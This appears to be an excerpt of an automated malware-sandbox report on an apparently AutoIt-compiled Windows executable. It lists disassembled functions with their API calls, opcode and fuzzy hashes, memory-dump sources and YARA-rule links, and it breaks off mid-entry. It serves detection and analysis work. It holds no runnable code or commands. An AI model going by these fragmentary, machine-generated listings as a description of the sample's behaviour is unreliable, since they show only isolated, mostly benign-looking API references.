Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 107bd3cb82b8b00ef60353ee35fc10c41585f16f3da29ca00d9483a9f961c1f8
Instruction ID: fe6a5bcaa35c2b9c56c5b3a59495985c06ee3b37c37c992f1eb55fdff1e8f463
Opcode Fuzzy Hash: 107bd3cb82b8b00ef60353ee35fc10c41585f16f3da29ca00d9483a9f961c1f8
Instruction Fuzzy Hash: 4D21F574A05388AFEB328B60DC55FF7BBEC9F02319F04049EE29D96181C7795A858B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A28F97, Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A28FA5

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_free.LIBCMT ref: 00A28FB6
_free.LIBCMT ref: 00A28FC8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 984e713af67172f978dbfc680e28cd4567cc8e96998a8cd3dc594288bb14f215
Instruction ID: 980ffe4a4bc11ee9d9e8feb4fd521b653bce962d67294e2943caec545709af7b
Opcode Fuzzy Hash: 984e713af67172f978dbfc680e28cd4567cc8e96998a8cd3dc594288bb14f215
Instruction Fuzzy Hash: 54D012A160D7504ACA24A7BDBE01A9357EE5B883127180C2DB149DB142DE28EC418124

Uniqueness

Uniqueness Score: -1.00%

Function 009C43DB, Relevance: 3.1, APIs: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(?,?), ref: 009C44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C44C3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: e17a6b6d36447d92043e5c425508fe6bf560a08ee627fe678c9ccf410149c791
Instruction ID: 755b7048d5c92774b04322bba664b75a1938dcaa44b24fb0b8c76812171e6e54
Opcode Fuzzy Hash: e17a6b6d36447d92043e5c425508fe6bf560a08ee627fe678c9ccf410149c791
Instruction Fuzzy Hash: A73181B1A053019FD724DF74E884BE7BBE8FB49349F10092EF199C2250E775A944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E594C, Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 009E5963

Part of subcall function 009EA408: GetModuleFileNameW.KERNEL32(?,00A843BA,00000104,?,00000001,00000000), ref: 009EA49A

Part of subcall function 009E32DF: ExitProcess.KERNEL32 ref: 009E32EE

RtlAllocateHeap.NTDLL(013A0000,00000000,?,00000000,?,?,?,009E1013,?), ref: 009E598F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExitFileHeapModuleNameProcess
String ID:
API String ID: 1715456479-0
Opcode ID: f514c52c6085fc2e57f8d3e2f8531b19918c144d07e486befe233bcb773ee06a
Instruction ID: 3da2ef01877dd09acb0d300932aa8067b9a7f09953af415f15e97ec96812e90c
Opcode Fuzzy Hash: f514c52c6085fc2e57f8d3e2f8531b19918c144d07e486befe233bcb773ee06a
Instruction Fuzzy Hash: C4012232201685EEE2136BB7EC41BAA774CCF82779F52012AF104AA0D2DA715D019335

Uniqueness

Uniqueness Score: -1.00%

Function 009F0D2D, Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00A4FB24,00000109,?,009F8469,00A4FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009F0D7D
GetLastError.KERNEL32(?,009F8469,00A4FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009F0D87

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 9651eb999e3de5f09cbf673c8a5fb43704dbd198ba3a9b06d214578559b48d4f
Instruction ID: 48ba5b781b18c7378bda7c8b3506c3207cd6cedd774392435825f1e46781f9b6
Opcode Fuzzy Hash: 9651eb999e3de5f09cbf673c8a5fb43704dbd198ba3a9b06d214578559b48d4f
Instruction Fuzzy Hash: 4401B13760236859DA3167F5BD4AB7E274C9BC2774F150219FB24CA0D3DAA2BC4143D1

Uniqueness

Uniqueness Score: -1.00%

Function 009C492E, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 009C4992

Part of subcall function 009E35AC: DecodePointer.KERNEL32(00000001,?,009C49A7,00A181BC), ref: 009E35BE
Part of subcall function 009E35AC: EncodePointer.KERNEL32(?,?,009C49A7,00A181BC), ref: 009E35C9

Part of subcall function 009C4A5B: SystemParametersInfoW.USER32(00002000,?,?), ref: 009C4A73
Part of subcall function 009C4A5B: SystemParametersInfoW.USER32(00002001,?,?,00000002), ref: 009C4A88

Part of subcall function 009C3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009C3B7A
Part of subcall function 009C3B4C: IsDebuggerPresent.KERNEL32 ref: 009C3B8C
Part of subcall function 009C3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A862F8,00A862E0,?,?), ref: 009C3BFD
Part of subcall function 009C3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 009C3C81

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 009C49D2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
String ID:
API String ID: 1658450864-0
Opcode ID: 99b08a1044f79cb2220cf07efc9e305a1394b43c4f834df2fea02d525f6b25bd
Instruction ID: 29e96688cd1edcff408e442c76ca6080d73bffdc11fd110d6c883e654e64e7e8
Opcode Fuzzy Hash: 99b08a1044f79cb2220cf07efc9e305a1394b43c4f834df2fea02d525f6b25bd
Instruction Fuzzy Hash: E1118C719183119FD300EFA9DC49A4AFBE8EBD4710F10891EF445872A2DB709946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009C5DF9, Relevance: 3.1, APIs: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,009C5981,?,?,?,?), ref: 009C5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,009C5981,?,?,?,?), ref: 009FE19C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a7c1347e55dff3a6dea6b27c6fd29150429940fcce235f8fec04d8688a59b873
Instruction ID: 366d3919b5d311aaba1f773f5f7781ed6df03b3da5d98d3f50560350efccf83d
Opcode Fuzzy Hash: a7c1347e55dff3a6dea6b27c6fd29150429940fcce235f8fec04d8688a59b873
Instruction Fuzzy Hash: 6111B574684708BEF7240E29CC8AF763B9CEB05768F118319FAE55A1E0C6B52E85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 009F5173, Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 009F5178
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009F51C1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: e2c712b2d9d7b7d5174385069ab636a211d16036ff8641e9dda0a50f07f138af
Instruction ID: 9abd5fdc6854a09f84a4c7c3fa7bdc62df8d35fff0b2733e252bdfee4ee23a47
Opcode Fuzzy Hash: e2c712b2d9d7b7d5174385069ab636a211d16036ff8641e9dda0a50f07f138af
Instruction Fuzzy Hash: BDF09073A09618BA9731ABE5AC99DBBBB3CD9C2365316012AF70852500E6226E4183F1

Uniqueness

Uniqueness Score: -1.00%

Function 009D2E02, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009D2E1A

Part of subcall function 009D0B30: PeekMessageW.USER32 ref: 009D0BBB

Sleep.KERNEL32(00000000), ref: 009D2E53

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: a4331230abd8f3c560a149321760955e527aa08cbcb99bec5d6cd363d8e5a476
Instruction ID: bd36bbdb8bcd984e61a6eca84ec9d85d954f6ec68c6ed7c4fd2f62e316fe1d64
Opcode Fuzzy Hash: a4331230abd8f3c560a149321760955e527aa08cbcb99bec5d6cd363d8e5a476
Instruction Fuzzy Hash: FFF08C352842019FC350EBA8D459F66BBE8AF96360F01403AE86DC7362CB70A801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DD64, Relevance: 1.7, APIs: 1, Instructions: 239COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00A3DE37

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcat
String ID:
API String ID: 1765576173-0
Opcode ID: 1bcfe9b282324986a798c9288d3b136c36e845fc0db7026530159e2e9bfd8719
Instruction ID: 8188dd5c25d8ab8f59f0e769783e3e5498953b422ca49563b0dc19d86eea5c59
Opcode Fuzzy Hash: 1bcfe9b282324986a798c9288d3b136c36e845fc0db7026530159e2e9bfd8719
Instruction Fuzzy Hash: 88912675A00104DFCB18DF28E5C5EA9BBF4EF95354B51846EF81A8F6A2DB31E901CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A25E1C, Relevance: 1.7, APIs: 1, Instructions: 152COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,?,?,?,?,00A27A0A,?), ref: 00A25E35

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: ce642f9ac3fb9fb564b05abafb506eb34149aa4a40476be7a7de4e85e3b3302f
Instruction ID: a03fee11bbedf4ef166e28142d69dbe53f7b10061c14af7f0003fa6dc73699b6
Opcode Fuzzy Hash: ce642f9ac3fb9fb564b05abafb506eb34149aa4a40476be7a7de4e85e3b3302f
Instruction Fuzzy Hash: A14185B2904619AEDB11DFB8E9819BFB7B8FF44364B20863EF51696140DB309F45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C9E9C, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1359f9ef755beb707d746a514b7fcde028430212d4f90a72e02b7d851f3599a6
Instruction ID: 46013cd9712cf23a359d0c9d3c991a291432285ad7c3f29021f2a93e01abf524
Opcode Fuzzy Hash: 1359f9ef755beb707d746a514b7fcde028430212d4f90a72e02b7d851f3599a6
Instruction Fuzzy Hash: 0B31A037800104DEEB39EB15C89CF37B7A9EF91391734482EE19687462CB36AC80DB12

Uniqueness

Uniqueness Score: -1.00%

Function 009C5C4E, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,00000000,?,?), ref: 009C5CF6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 51a9ddbd3a82784e5b4eb8be96192b4f2f265d7c27ea61e4775356b8eee321b3
Instruction ID: 8048a09d470887dc07c83909a015ca18673929e53470dde546500a234602214e
Opcode Fuzzy Hash: 51a9ddbd3a82784e5b4eb8be96192b4f2f265d7c27ea61e4775356b8eee321b3
Instruction Fuzzy Hash: DE314371A00B09AFDB18DF59D484F99B7B4FF84320F15851DE81993650D731B990CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A3D95D, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A3DA67

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: da981b87a6f36e7b4136c58ef1209178463666917f5000fa35bc1319442497ba
Instruction ID: 9ff7f983c566364f20befc348bdc6ec4ed2daf4b978dd684b94814b314ac0f9b
Opcode Fuzzy Hash: da981b87a6f36e7b4136c58ef1209178463666917f5000fa35bc1319442497ba
Instruction Fuzzy Hash: 4D310676A08524DFCB10EF44F584BAA7BB5FF85370F208489F5995F246C731A941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009E7E93, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 009EA048: GetStartupInfoW.KERNEL32(?), ref: 009EA052

GetCommandLineW.KERNEL32(00A7BD38,00000014), ref: 009E7F33

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandInfoLineStartup
String ID:
API String ID: 582193876-0
Opcode ID: 5c1a3a8e77d67e436ef78256ec080ccfb7a438d3361ae6d42574ef1b5d485669
Instruction ID: 0f5aeb74860cbbb7c79b625b3bd9cb6f49d5ab3b5a1b2406fe79afa3f5013c72
Opcode Fuzzy Hash: 5c1a3a8e77d67e436ef78256ec080ccfb7a438d3361ae6d42574ef1b5d485669
Instruction Fuzzy Hash: 97210220A0C385D9DB22BBF7984BF796268AFC0715F104869F6149A1D2DFB4CD4083A3

Uniqueness

Uniqueness Score: -1.00%

Function 00A000D6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A000E1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c117a44afc2177ac0207f8a93d000bd7da510f9b32557362984bc67a72101b96
Instruction ID: dc21edfd7510c3fbcf2a27c701dc572852efcdb865e51fd6c802c65d74c92381
Opcode Fuzzy Hash: c117a44afc2177ac0207f8a93d000bd7da510f9b32557362984bc67a72101b96
Instruction Fuzzy Hash: 6041F574908345DFDB24DF14C484F1ABBE0BF85318F19899CE58A4B7A2C736E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C73E5, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 009FEEAC

Part of subcall function 009C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C48A1,?,?,009C37C0,?), ref: 009C48CE

Part of subcall function 009E09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009E09F4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Path$FileFullLongOpen
String ID:
API String ID: 779396738-0
Opcode ID: 13f4c387e4f0289d0af3cd1300aa49869a1eaa43a30aad79220836b45a127b04
Instruction ID: 3eba28cb7a0671ad6b195a841ff062a486076a59c2a5096d633865cc3e6445a6
Opcode Fuzzy Hash: 13f4c387e4f0289d0af3cd1300aa49869a1eaa43a30aad79220836b45a127b04
Instruction Fuzzy Hash: 0B21C231900248AADB059FD4DC05FFEBBBCDF86311F10802AF108E7141DBB559898FA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C4F3D, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C4D13: FreeLibrary.KERNEL32(00000000,?,009C4F4F,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4D4D

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4F6F

Part of subcall function 009C4CC8: FreeLibrary.KERNEL32(00000000,009FDD1E,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4D02

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: bcf88e58443bb871092b995ea2dad132e16b4a573a3d78557175cb12888cd875
Instruction ID: 0a8957f80541ffa46869c2976db9d0a9c242f5110ac17aaa514849b84f24d6ee
Opcode Fuzzy Hash: bcf88e58443bb871092b995ea2dad132e16b4a573a3d78557175cb12888cd875
Instruction Fuzzy Hash: C5110432B40609BEDB10FFA0EC56FAF77A8DF81311F20882DF546A50C1DA3156009762

Uniqueness

Uniqueness Score: -1.00%

Function 00A001AF, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A001BB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5ddacbd7f787e35e3d45fad61c5790cf48e4cc3c7b3c34464b49bf14b57b95ca
Instruction ID: 7d2709b4641bd7a890956a63ac4c9f13267218d3a5f1f83acbb13317493124f8
Opcode Fuzzy Hash: 5ddacbd7f787e35e3d45fad61c5790cf48e4cc3c7b3c34464b49bf14b57b95ca
Instruction Fuzzy Hash: 9E21FEB4908345DFCB25DF64C444F1ABBE4BB88308F04896CE98A57761D731E849CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 009E54A0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 009E552B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CallFilterFunc@8
String ID:
API String ID: 4062629308-0
Opcode ID: 317b7213d4b4c962ae89db1a415fefe440801c016c3e695a5eb870337b864929
Instruction ID: a212fbc5d1a4b5b21c93dddeea9c6d8a3d7b9e7212596beaf700c38b8ae25c32
Opcode Fuzzy Hash: 317b7213d4b4c962ae89db1a415fefe440801c016c3e695a5eb870337b864929
Instruction Fuzzy Hash: 551104B1900286EBDB12AFB68C0276F36A8AF84324F068415F419D61C2EE348D419761

Uniqueness

Uniqueness Score: -1.00%

Function 009CB93D, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A01054

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 59c93815a2a5bd817baebdb30037ea0b195b4e91f853e9dc4ed71bd2cfd448e0
Instruction ID: b66562fe900e96c56daf400f505920f9279beae110507311d26e5c77ac818bc0
Opcode Fuzzy Hash: 59c93815a2a5bd817baebdb30037ea0b195b4e91f853e9dc4ed71bd2cfd448e0
Instruction Fuzzy Hash: 0E11CBB2205556BED619AB74EC85FFAFB6CFB45398F004A2BF519D1060CB31AA10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009C5D20, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00010000,00000000,00000000,00000000,?,00010000,?,009C5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 009C5D76

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: dd3ccbe3a126c9156f48106d8c28886fb8865704d1612f0b346bda21778e8571
